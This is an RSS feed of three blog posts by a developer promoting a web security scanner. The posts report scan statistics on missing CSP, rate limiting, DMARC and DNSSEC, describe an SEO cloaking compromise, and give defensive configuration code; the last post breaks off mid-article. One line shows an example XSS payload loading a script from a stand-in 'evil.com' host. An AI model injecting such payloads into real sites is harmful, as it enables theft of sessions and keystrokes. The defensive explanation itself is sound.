<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>Forem: Raz Azulay</title>
    <description>The latest articles on Forem by Raz Azulay (@razazu).</description>
    <link>https://forem.com/razazu</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3855332%2F87bbe53b-2087-40fb-b6c1-cb1e0952e152.jpeg</url>
      <title>Forem: Raz Azulay</title>
      <link>https://forem.com/razazu</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://forem.com/feed/razazu"/>
    <language>en</language>
    <item>
      <title>I scanned 596 websites in 2 months. 81.6% had no rate limiting. Here is what else is broken in 2026.</title>
      <dc:creator>Raz Azulay</dc:creator>
      <pubDate>Thu, 30 Apr 2026 12:16:42 +0000</pubDate>
      <link>https://forem.com/razazu/i-scanned-596-websites-in-2-months-816-had-no-rate-limiting-here-is-what-else-is-broken-in-2026-5201</link>
      <guid>https://forem.com/razazu/i-scanned-596-websites-in-2-months-816-had-no-rate-limiting-here-is-what-else-is-broken-in-2026-5201</guid>
      <description>&lt;p&gt;Two months ago I shipped UNPWNED, a passive web security scanner aimed at indie hackers and developers shipping AI-generated code (Cursor, Lovable, Bolt, Replit, v0).&lt;/p&gt;

&lt;p&gt;I had a hypothesis: small-team apps, especially anything coded with AI assistance, would have terrible security hygiene. Not because the developers are lazy, but because nobody is checking. There is no security review when you ship at 2am from your bedroom.&lt;/p&gt;

&lt;p&gt;Two months in, &lt;strong&gt;548 developers ran 1,317 scans&lt;/strong&gt; through it across &lt;strong&gt;596 distinct domains&lt;/strong&gt;. The scanner logged &lt;strong&gt;10,577 findings&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;The data is worse than I expected.&lt;/p&gt;

&lt;p&gt;This post is what I found. Not opinions. Not vibes. Real numbers from real production sites people own.&lt;/p&gt;

&lt;h2&gt;
  
  
  The headline numbers
&lt;/h2&gt;

&lt;p&gt;Across every distinct domain scanned, deduplicated to the latest scan per site, here is what is exposed:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;92.6%&lt;/strong&gt; have &lt;strong&gt;no DNSSEC&lt;/strong&gt;. Their entire domain can be DNS-spoofed at the resolver layer.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;81.6%&lt;/strong&gt; have &lt;strong&gt;no rate limiting&lt;/strong&gt; anywhere. Anyone can run an unlimited brute-force against them right now.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;78.5%&lt;/strong&gt; have &lt;strong&gt;no DKIM&lt;/strong&gt;. Email signing is missing, so domain spoofing is much easier.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;69.6%&lt;/strong&gt; have &lt;strong&gt;no discoverable privacy policy&lt;/strong&gt; at standard paths. That alone is a GDPR violation in the EU.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;66.9%&lt;/strong&gt; are missing a &lt;strong&gt;Content-Security-Policy&lt;/strong&gt; header. One stored XSS and the attacker has full control of the page.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;52.7%&lt;/strong&gt; have &lt;strong&gt;no DMARC&lt;/strong&gt; policy. Their email domain can be impersonated for phishing at scale.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;43.3%&lt;/strong&gt; have &lt;strong&gt;no SPF&lt;/strong&gt; record either, finishing the email-impersonation hat trick.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;99.7%&lt;/strong&gt; have &lt;strong&gt;no security.txt&lt;/strong&gt; (RFC 9116). When a researcher finds a bug, there is nowhere to send it.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;For comparison, here is what they actually got right:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;100%&lt;/strong&gt; of sites where SSL was measurable had valid SSL/TLS. Good. Let's Encrypt did its job.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The average security grade across all sites: &lt;strong&gt;70.8 out of 100&lt;/strong&gt;. A pass on a college midterm. A fail on a production checklist.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why this is worse than it sounds
&lt;/h2&gt;

&lt;p&gt;A "missing security header" sounds boring on paper. Here is what it actually means:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;No rate limiting on &lt;code&gt;/api/auth/login&lt;/code&gt;:&lt;/strong&gt; an attacker takes a leaked credential dump from another breach and replays it against your site at 1,000 attempts per second. If even 0.1% of your users reuse passwords (the real number is closer to 60%), the attacker is now logged in as your users.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;No CSP:&lt;/strong&gt; your site has a single XSS bug somewhere, anywhere. A user comment, a markdown field, a profile bio. Without CSP, the attacker injects &lt;code&gt;&amp;lt;script src="evil.com/x.js"&amp;gt;&lt;/code&gt; and now they read every keystroke, every session token, every form value. With CSP set correctly, the script never runs.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;No DMARC:&lt;/strong&gt; I send an email from &lt;code&gt;support@yourcompany.com&lt;/code&gt; to all your users with a "verify your account" link that goes to my phishing page. Your mail server has no policy telling Gmail to reject it. Gmail delivers it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;No DNSSEC:&lt;/strong&gt; your DNS resolver answers &lt;code&gt;yourapp.com&lt;/code&gt; and points to &lt;code&gt;1.2.3.4&lt;/code&gt;. An attacker on a compromised network can poison that response and point to &lt;code&gt;6.6.6.6&lt;/code&gt; instead. Without DNSSEC the resolver has no way to verify the answer is authentic.&lt;/p&gt;

&lt;p&gt;These are not theoretical. These are the attacks that already happen every day to small SaaS, and the population running without protection is the majority.&lt;/p&gt;

&lt;h2&gt;
  
  
  The case I will not forget
&lt;/h2&gt;

&lt;p&gt;Most of what UNPWNED finds is configuration drift. Boring. Fixable in 5 minutes once you know.&lt;/p&gt;

&lt;p&gt;But one site stood out.&lt;/p&gt;

&lt;p&gt;A user submitted a real production domain for a deep scan. The site looked completely normal in a browser. Generic landing page, a few links, nothing weird.&lt;/p&gt;

&lt;p&gt;UNPWNED's cloaking detector compares what a real visitor sees against what Googlebot sees. The two should be identical. They were not even close.&lt;/p&gt;

&lt;p&gt;To a human visitor: a normal page.&lt;br&gt;
To Googlebot: roughly 64,000 spam pages selling counterfeit collectibles.&lt;/p&gt;

&lt;p&gt;The site had been compromised in a Japanese SEO Hack pattern. The attacker had injected sub-sitemaps that were only served to crawlers, then mounted ghost URLs that returned 404 to people but 200 to Google with full spam content. The site owner had no idea. Their actual product was clean. The attacker was using their domain authority to rank spam, completely invisibly.&lt;/p&gt;

&lt;p&gt;We caught it because the scanner samples ghost URLs from sub-sitemaps and compares User-Agent responses. 75 sub-sitemaps was a red flag (anything over 20 is suspicious). The spam keywords in the sub-sitemap titles were the smoking gun.&lt;/p&gt;

&lt;p&gt;If you have ever wondered "why is my Google traffic dropping for no reason," this is one of the answers nobody mentions.&lt;/p&gt;
&lt;h2&gt;
  
  
  What is going wrong
&lt;/h2&gt;

&lt;p&gt;Three patterns explain almost everything I see:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. AI-generated code skips the boring parts.&lt;/strong&gt;&lt;br&gt;
When you ask Cursor or Claude to "build me a login form," it builds a working login form. It does not build rate limiting. It does not set up CSP. It does not configure DMARC. Those are runtime concerns, not code concerns, and the AI tools live in code.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. The default of every framework is insecure.&lt;/strong&gt;&lt;br&gt;
Next.js, SvelteKit, Astro, Nuxt. None of them ship with a real CSP. None of them rate-limit by default. The defaults assume you will configure security yourself. Most developers do not.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Hosting platforms hide the gaps.&lt;/strong&gt;&lt;br&gt;
Vercel and Netlify give you free SSL, free deploys, free domains. Beautiful. They do not give you free rate limiting, free CSP, or free DMARC. The gap between "deployed" and "secure" is invisible until you scan for it.&lt;/p&gt;
&lt;h2&gt;
  
  
  How to fix the four most common ones in under 30 minutes
&lt;/h2&gt;

&lt;p&gt;I am going to give you the actual code. Take it.&lt;/p&gt;
&lt;h3&gt;
  
  
  1. CSP header (Next.js example)
&lt;/h3&gt;

&lt;p&gt;In your &lt;code&gt;middleware.ts&lt;/code&gt; or &lt;code&gt;proxy.ts&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;cspHeader&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;`
  default-src 'self';
  script-src 'self' 'nonce-&lt;/span&gt;&lt;span class="p"&gt;${&lt;/span&gt;&lt;span class="nx"&gt;nonce&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;';
  style-src 'self' 'unsafe-inline';
  img-src 'self' data: https:;
  font-src 'self';
  object-src 'none';
  base-uri 'self';
  form-action 'self';
  frame-ancestors 'none';
  upgrade-insecure-requests;
`&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Set it on every response. Test it does not break your app. Tighten further from there.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Rate limiting on auth routes
&lt;/h3&gt;

&lt;p&gt;Use Upstash Redis (free tier is generous):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;Ratelimit&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;from&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;@upstash/ratelimit&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;
&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;Redis&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;from&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;@upstash/redis&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;

&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;ratelimit&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nc"&gt;Ratelimit&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
  &lt;span class="na"&gt;redis&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;Redis&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;fromEnv&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt;
  &lt;span class="na"&gt;limiter&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;Ratelimit&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;slidingWindow&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;60 s&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
&lt;span class="p"&gt;})&lt;/span&gt;

&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;success&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;ratelimit&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;limit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;ip&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="k"&gt;if &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nx"&gt;success&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nc"&gt;Response&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;Too Many Requests&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;status&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;429&lt;/span&gt; &lt;span class="p"&gt;})&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;5 attempts per minute per IP on &lt;code&gt;/api/auth/login&lt;/code&gt; kills 99% of credential stuffing.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. DMARC record
&lt;/h3&gt;

&lt;p&gt;Add a DNS TXT record at &lt;code&gt;_dmarc.yourdomain.com&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;v=DMARC1; p=quarantine; rua=mailto:dmarc-reports@yourdomain.com; pct=100
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Start with &lt;code&gt;p=none&lt;/code&gt; if you are nervous, watch the reports for a week, then move to &lt;code&gt;quarantine&lt;/code&gt;. This blocks email impersonation cold.&lt;/p&gt;

&lt;h3&gt;
  
  
  4. DNSSEC
&lt;/h3&gt;

&lt;p&gt;This one depends on your registrar. Cloudflare and Namecheap both have a one-click toggle for it. Most developers do not know it exists. Turn it on.&lt;/p&gt;

&lt;h2&gt;
  
  
  What I learned building this
&lt;/h2&gt;

&lt;p&gt;Three things, in case you are thinking about building something similar.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Indie devs do not buy "security tools." They buy "did I ship something stupid" anxiety relief.&lt;/strong&gt; When I positioned UNPWNED as an enterprise-grade vulnerability scanner, conversion was 0.5%. When I positioned it as "scan your domain in 2 minutes before you launch," conversion went up 8x. The product did not change. The job-to-be-done framing changed.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;AI fix prompts beat security reports for this audience.&lt;/strong&gt; Every finding in UNPWNED ships with a copy-paste prompt that the user pastes into Cursor or Claude. The fix happens in their existing workflow. No context switching. The "you have a CSP problem" report is a chore. The "paste this into your AI editor and ship" prompt is a victory lap.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The data itself is the marketing.&lt;/strong&gt; You are reading this post because the title had a number in it. I would not have hooked you with "I built a security scanner." I hooked you with "81.6% of websites have no rate limiting." Build the thing that gives you proprietary data, then publish the data.&lt;/p&gt;

&lt;h2&gt;
  
  
  Try it on your own site
&lt;/h2&gt;

&lt;p&gt;If you read this far and you have a side project online, run a scan. It takes 2 minutes, no signup needed, no credit card.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://unpwned.io/check" rel="noopener noreferrer"&gt;unpwned.io/check&lt;/a&gt; takes a domain and gives you a security grade plus the actual list of what is broken.&lt;/p&gt;

&lt;p&gt;Full live data on these statistics, including the methodology and a 30-day attack telemetry feed: &lt;a href="https://unpwned.io/data" rel="noopener noreferrer"&gt;unpwned.io/data&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;If you find something on a real production site that scares you, post it in the comments. I will look at it.&lt;/p&gt;

&lt;p&gt;Stay unpwned.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Methodology: figures are deduplicated by domain (latest scan per distinct domain). DNS-based percentages (DNSSEC, DMARC, SPF, DKIM) are based on full data coverage. HTTP-dependent percentages (rate limiting, SSL grading) exclude scans where the target was blocked by Cloudflare or WAF and the scanner could not measure conclusively. Sample: 596 distinct domains, 1,317 total scans, 10,577 findings logged between March 2 and April 30, 2026.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>webdev</category>
      <category>indiehackers</category>
      <category>devops</category>
    </item>
    <item>
      <title>I Scanned 447 Websites. AI-Built Sites Have 3x More High-Severity Vulnerabilities.</title>
      <dc:creator>Raz Azulay</dc:creator>
      <pubDate>Mon, 06 Apr 2026 13:02:17 +0000</pubDate>
      <link>https://forem.com/razazu/i-scanned-447-websites-ai-built-sites-have-3x-more-high-severity-vulnerabilities-3708</link>
      <guid>https://forem.com/razazu/i-scanned-447-websites-ai-built-sites-have-3x-more-high-severity-vulnerabilities-3708</guid>
      <description>&lt;p&gt;I'm Raz. I've been building a security scanner called UNPWNED for the past few months. It runs thousands of checks across dozens of scanners on any website - headers, DNS, SSL, exposed files, secrets, you name it.&lt;/p&gt;

&lt;p&gt;After 447 scans and 3,993 findings, I have enough data to share. Some of this stuff genuinely surprised me.&lt;/p&gt;

&lt;h2&gt;
  
  
  The big picture
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;447 sites scanned, 3,993 vulnerabilities found&lt;/li&gt;
&lt;li&gt;Average site has 8.9 security issues&lt;/li&gt;
&lt;li&gt;Average score: 73.1 out of 100&lt;/li&gt;
&lt;li&gt;Only 16.3% scored A or A+&lt;/li&gt;
&lt;li&gt;37% scored C (the most common grade)&lt;/li&gt;
&lt;li&gt;53% scored C or worse&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Most websites aren't terrible. They're just... mediocre. A bunch of missing headers and DNS records that nobody thought to configure.&lt;/p&gt;

&lt;h2&gt;
  
  
  AI-built vs human-built - this is the big one
&lt;/h2&gt;

&lt;p&gt;I started tagging sites that showed signals of being AI-generated (Lovable, Bolt, Cursor, v0 patterns). The gap is real:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;AI-Built&lt;/th&gt;
&lt;th&gt;Human-Built&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Avg Score&lt;/td&gt;
&lt;td&gt;63.7&lt;/td&gt;
&lt;td&gt;75.7&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Avg Findings&lt;/td&gt;
&lt;td&gt;12.2&lt;/td&gt;
&lt;td&gt;9.7&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;HIGH Severity&lt;/td&gt;
&lt;td&gt;2.1 per site&lt;/td&gt;
&lt;td&gt;0.7 per site&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;AI-built sites have 3x more high-severity vulnerabilities.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Why? Because AI tools are really good at building features that work. They'll set up your auth, your API routes, your database queries. But they almost never add:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Security headers (CSP, HSTS)&lt;/li&gt;
&lt;li&gt;DNS hardening (DMARC, DNSSEC)&lt;/li&gt;
&lt;li&gt;Rate limiting&lt;/li&gt;
&lt;li&gt;CORS restrictions&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Nobody prompts "oh and add DMARC and CSP headers please." And the AI doesn't volunteer it.&lt;/p&gt;

&lt;h2&gt;
  
  
  The 5 things almost nobody has
&lt;/h2&gt;

&lt;p&gt;This is across ALL 447 sites, not just AI-built:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Missing Defense&lt;/th&gt;
&lt;th&gt;% Without It&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Rate Limiting&lt;/td&gt;
&lt;td&gt;74%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Content Security Policy&lt;/td&gt;
&lt;td&gt;72%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;DNSSEC&lt;/td&gt;
&lt;td&gt;72%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;DMARC&lt;/td&gt;
&lt;td&gt;47%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Privacy Policy&lt;/td&gt;
&lt;td&gt;68%&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;74% have no rate limiting. That means bots can brute-force your login endpoint all day and your server won't even notice.&lt;/p&gt;

&lt;p&gt;72% have no CSP. One XSS vulnerability and any script runs freely on your pages.&lt;/p&gt;

&lt;p&gt;47% have no DMARC. Anyone can send emails pretending to be &lt;a href="mailto:you@yourdomain.com"&gt;you@yourdomain.com&lt;/a&gt;. Your users will get phishing emails that look like they came from you.&lt;/p&gt;

&lt;h2&gt;
  
  
  How different platforms score
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Platform&lt;/th&gt;
&lt;th&gt;Avg Score&lt;/th&gt;
&lt;th&gt;Avg Findings&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Vercel&lt;/td&gt;
&lt;td&gt;75.9&lt;/td&gt;
&lt;td&gt;7.0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;WordPress&lt;/td&gt;
&lt;td&gt;76.5&lt;/td&gt;
&lt;td&gt;9.4&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Next.js&lt;/td&gt;
&lt;td&gt;75.1&lt;/td&gt;
&lt;td&gt;7.1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cloudflare&lt;/td&gt;
&lt;td&gt;72.2&lt;/td&gt;
&lt;td&gt;7.6&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Netlify&lt;/td&gt;
&lt;td&gt;64.2&lt;/td&gt;
&lt;td&gt;13.4&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Vercel and Next.js do better than average but still miss critical stuff. Netlify sites scored the lowest among modern platforms - not sure why, might be the default headers config.&lt;/p&gt;

&lt;h2&gt;
  
  
  Grade distribution
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Grade&lt;/th&gt;
&lt;th&gt;% of Sites&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;A+&lt;/td&gt;
&lt;td&gt;8.9%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;A&lt;/td&gt;
&lt;td&gt;7.4%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;B&lt;/td&gt;
&lt;td&gt;30.6%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;C&lt;/td&gt;
&lt;td&gt;37.1%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;D&lt;/td&gt;
&lt;td&gt;13.6%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;F&lt;/td&gt;
&lt;td&gt;2.2%&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The most common grade is C. Not failing, but not anywhere close to secure.&lt;/p&gt;

&lt;h2&gt;
  
  
  What you can fix in 30 minutes
&lt;/h2&gt;

&lt;p&gt;The gap between a C and a B (or even an A) is usually not a rewrite. It's a few configs:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Add CSP headers&lt;/strong&gt;&lt;br&gt;
Even a basic Content Security Policy blocks most XSS vectors. If you're on Next.js, it's a few lines in your middleware.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Set up DMARC&lt;/strong&gt;&lt;br&gt;
Add a DNS TXT record for _dmarc.yourdomain.com. It tells email servers to reject spoofed emails from your domain. Takes 5 minutes.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Add rate limiting on auth routes&lt;/strong&gt;&lt;br&gt;
Even a simple IP-based limit (like 10 attempts per minute) stops brute force attacks. Most frameworks have middleware for this.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4. Enable DNSSEC&lt;/strong&gt;&lt;br&gt;
This is usually a one-click toggle at your DNS provider (Cloudflare, Namecheap, etc).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;5. Check your CORS policy&lt;/strong&gt;&lt;br&gt;
If you're using &lt;code&gt;Access-Control-Allow-Origin: *&lt;/code&gt; in production, you're letting any website make requests to your API.&lt;/p&gt;

&lt;h2&gt;
  
  
  Check your own site
&lt;/h2&gt;

&lt;p&gt;I built UNPWNED because I was shipping fast with AI tools and had no idea what was exposed. The scanner checks thousands of things across dozens of scanners, only looks at publicly visible information (same stuff anyone visiting your site can see), and it's free to try.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://www.unpwned.io" rel="noopener noreferrer"&gt;unpwned.io&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;No account needed for a quick scan. Happy to answer questions about the methodology or findings in the comments.&lt;/p&gt;

</description>
      <category>ai</category>
      <category>cybersecurity</category>
      <category>security</category>
      <category>webdev</category>
    </item>
    <item>
      <title>We Scanned 400+ Websites. Here's What We Found.</title>
      <dc:creator>Raz Azulay</dc:creator>
      <pubDate>Wed, 01 Apr 2026 10:56:56 +0000</pubDate>
      <link>https://forem.com/razazu/we-scanned-400-websites-heres-what-we-found-4n26</link>
      <guid>https://forem.com/razazu/we-scanned-400-websites-heres-what-we-found-4n26</guid>
      <description>&lt;p&gt;  &lt;iframe src="https://www.youtube.com/embed/nhA2FvqTZgo"&gt;
  &lt;/iframe&gt;
&lt;/p&gt;

&lt;p&gt;We built &lt;a href="https://www.unpwned.io" rel="noopener noreferrer"&gt;UNPWNED&lt;/a&gt;, a security scanner for web apps. Over the past few weeks, we scanned 400+ websites across startups, SaaS products, and side projects.&lt;/p&gt;

&lt;p&gt;Here's what the data told us.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Numbers
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;412 scans&lt;/strong&gt; across &lt;strong&gt;167 unique domains&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Average first-scan score: &lt;strong&gt;65 out of 100&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Only &lt;strong&gt;2% scored an A&lt;/strong&gt; on their first scan&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;58% scored a C&lt;/strong&gt;, &lt;strong&gt;23% scored D or F&lt;/strong&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  The Most Common Issues
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Issue&lt;/th&gt;
&lt;th&gt;% of Sites Affected&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;DNSSEC not enabled&lt;/td&gt;
&lt;td&gt;75%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;No rate limiting on API endpoints&lt;/td&gt;
&lt;td&gt;70%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Missing Content Security Policy&lt;/td&gt;
&lt;td&gt;69%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Weak CSP configuration&lt;/td&gt;
&lt;td&gt;57%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;No cookie consent mechanism&lt;/td&gt;
&lt;td&gt;48%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Missing DMARC record (email spoofing risk)&lt;/td&gt;
&lt;td&gt;47%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;No privacy policy page detected&lt;/td&gt;
&lt;td&gt;40%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Missing DKIM record&lt;/td&gt;
&lt;td&gt;37%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Missing HSTS header&lt;/td&gt;
&lt;td&gt;34%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Permissive CORS policy&lt;/td&gt;
&lt;td&gt;29%&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  What Surprised Us
&lt;/h2&gt;

